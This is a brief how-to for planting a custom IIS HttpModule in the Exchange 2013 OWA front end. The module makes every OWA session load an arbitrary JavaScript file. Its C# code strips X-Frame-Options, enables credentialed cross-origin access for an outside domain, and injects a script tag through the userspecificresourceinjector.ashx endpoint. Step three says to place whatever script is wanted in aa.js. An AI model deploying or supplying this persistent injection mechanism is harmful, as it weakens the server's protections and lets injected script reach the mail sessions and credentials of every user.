Inject js code to exchange 2013
1. save the following code to C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa on exchagne front end server
using System; using System.Collections.Generic; using System.Linq; using System.Web; using System.Security; using System.Security.Principal; using System.IO; using System.Text; using System.Web.UI; namespace ZY { public class M1 : IHttpModule { public void Dispose() { } public void Init(HttpApplication application) { if (application != null) { application.PostMapRequestHandler += (o, e) => { HttpContext context = ((HttpApplication)o).Context; }; application.BeginRequest += (o, e) => { var app = (HttpApplication)o; var Response = app.Response; var Request = app.Request; string urlFlag = "userspecificresourceinjector.ashx"; if (Request.Url.ToString().ToLower().Contains(urlFlag)) { //Response.Buffer = true; } }; } application.PreSendRequestHeaders += new EventHandler(application_PreSendRequestHeaders); application.PreSendRequestContent += new EventHandler(application_PreSendRequestContent); } void application_PreSendRequestHeaders(object sender, EventArgs e) { HttpApplication application = (HttpApplication)sender; application.Context.Response.Headers.Set("X-Frame-Options",""); application.Context.Response.Headers.Remove("X-Frame-Options"); //response.setHeader("Access-Control-Allow-Origin", "*"); //application.Context.Response.Headers.Set("Access-Control-Allow-Origin","*"); application.Context.Response.Headers.Set("Access-Control-Allow-Origin","https://mail.abc.net"); application.Context.Response.Headers.Set("P3P","CP=CAO PSA OUR"); application.Context.Response.Headers.Set("allow-credentials","true"); application.Context.Response.Headers.Set("Access-Control-Allow-Credentials","true"); //userspecificresourceinjector.ashx } void application_PreSendRequestContent(object sender, EventArgs e) { HttpApplication application = (HttpApplication)sender; //application.Context.Response.Write("application_PreSendRequestContent<br/>"); //var Response=application.Context.Response; var Response = System.Web.HttpContext.Current.Response; var Request=application.Context.Request; string urlFlag="userspecificresourceinjector.ashx"; if(Request.Url.ToString().ToLower().Contains(urlFlag)) { //Response.ExpiresAbsolute = System.DateTime.Now.AddSeconds(-1); //Response.Expires = 0; //Response.CacheControl = "no-cache"; //Response.AddHeader("Pragma", "No-Cache"); Response.ContentType = "application/javascript; charset=utf-8"; //Response.StatusCode = 200; //Response.Write("includeScriptsAndStyles(slabManifest, \"/owa/auth/aa.js?\");"); //Response.Write("includeScriptsAndStyles(slabManifest, \"/jquery-1.9.1.js?\");"); //Response.Write("document.write(\"<script type='text/javascript' src='/owa/auth/jquery-1.9.1.js'></script>\");"); //Response.Write("var zyflag=true;"); Response.Write("document.write(\'<script type=\"text/javascript\" src=\"/owa/auth/aa.js?x=" + System.DateTime.Now.Millisecond.ToString() + "\"></script>\');"); //Response.Write("document.write(\'<script type=\"text/javascript\" src=\"/owa/auth/aa.js?x=\"></script>\');"); //Response.Write("eval(\"<script type='text/javascript' src='/owa/auth/aa.js'></script>\");"); //Response.Flush(); } } } }
2. add following code to web.config in c:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa
<modules> <add name="zy" type="ZY.M1" /> </modules>
3. save your aa.js to c:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\
The content in aa.js is what you want to inject into